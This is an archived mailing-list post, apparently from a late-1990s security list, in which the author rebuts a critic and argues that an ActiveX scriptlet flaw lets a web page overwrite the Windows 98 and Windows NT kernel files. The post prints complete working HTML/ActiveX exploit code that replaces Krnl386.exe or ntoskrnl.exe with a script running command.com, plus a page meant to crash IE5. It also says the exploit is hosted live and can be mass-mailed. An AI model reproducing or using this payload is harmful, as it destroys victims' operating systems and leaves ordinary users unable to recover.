After further research into David LeBlanc's debunking of my posting I have discovered (rather remembered) that ntoskrnl is loaded from the system folder into memory where it is accessed exclusively, this frees it from the write restriction due to system use. I think he must administrate Windows 98 domains which do not let you modify the Kernel (called Krnl386.exe) I'm sorry I have taken so long to respond to the criticism but I felt that I, unlike others, should do my research first. Let me summarize the current understanding ANY Windows 98 file can be overwritten. Period. If you try and manually pasting over or destroying the file you will be denied, however Active X can help where you can't. In fact, ironically, after it's been corrupted you cannot fix it because you are denied from touching it! If Windows 98 is restarted or crashed (hint, forced to crash), then it will fail start up with a Fatal Exception, you can only recover from DOS by restoring the file. I would like to note, for the record, that the vast majority of home users who will never know about the patch to this file or know what Active X even is are not in possession of 98 install disks. Rather they are in possession of a disk that restores the computer to factory original. Despite David LeBlanc et al. assurance that we could just disable Active X I'm discussing it because you know your poor parents are NEVER going to, how would they understand the instructions? And, of course, what average user could EVER recover from this sort of damage? Onto Windows NT, yes, David was correct, you can bar write access in NTFS and it cannot be written to. I have not invested any interest in this but I assume there is at least one critical system file (possibly security file) that he would miss and might be overwritten. In fact the default for the Administrator or one with Administrator privileges is Full Access. Of course this would allow the exploit to run. The other thing to remember is that in very small domains the average user is generally administrator and remember this exploit can be E-Mailed!!! or mass-mailed! get my drift? The other thing is that the default install for NT (especially on HP's) is FAT, which does not allow specific file security. Anyone know a dual-booter? Maybe someone who doesn't even know what NTFS is? I thought so. Well, I must admit I'm tired of the down playing and guessing. I have decided to put the ball in play. I have posted a web page, on my domain mind you, that contains the Hacks for both OS's. Understand that if you visit them the hack will run and when it runs, if you're not prepared, you will be very unhappy. I have included the code here so that you can see what happens. The link is http://www.sassproductions.com/hacked.htm The code for the 98 exploit is <p> <object id="scr" classid="clsid:06290BD5-48AA-11D2-8432-006008C3FBFC" width="14" height="14" ></object><script> scr.Reset(); scr.Path="C:\\windows\\system\\Krnl386.exe"; scr.Doc="<object id='wsh' classid='clsid:F935DC22-1CF0-11D0-ADB9-00C04FD58A0B'></object><SCRIPT>alert( 'Screw Denise Richards, Debbie Johnson r0x!');wsh.Run('c:\\command.com');</"+"SCRIPT>"; scr.write(); </script> </p> See how simply that was adapted? I polished it not-at-all so you can see the minimal changes. At this point you would be automatically transferred to a second web page that would contain the following code. <html> <head> <title>Self Destruct </title> </head> <body> <form method="POST"> <table> <tr> <td width="20%"><input type="text" name="State" size="99999999" maxlength="99999999" value=""></td> </tr> </table> </form> </body> </html> Recognize that? It's the code to DoS IE5. Most simple users would restart at this point, never notice a web page change, and lose their Kernel. Here's the NT code <p> <object id="scr" classid="clsid:06290BD5-48AA-11D2-8432-006008C3FBFC" width="14" height="14"> </object> <script> scr.Reset(); scr.Path="C:\\WINNT\\System32\\ntoskrnl.exe"; scr.Doc="<object id='wsh' classid='clsid:F935DC22-1CF0-11D0-ADB9-00C04FD58A0B'></object><SCRIPT>alert( 'Screw Denise Richards, Debbie Johnson r0x!');wsh.Run('c:\\command.com');</"+"SCRIPT>"; scr.write(); </script> </p> Not bad 'huh? This exploit needs to be realized for what it is, a very dangerous problem. If someone mass-mailed it to my domain I wouldn't be able to deal with bouncing between three offices helping EVERY single user. If someone has a problem with my post feel free to mention it. Seth Georgion
This archive was generated by hypermail 2b30 : Fri Apr 13 2001 - 15:00:39 PDT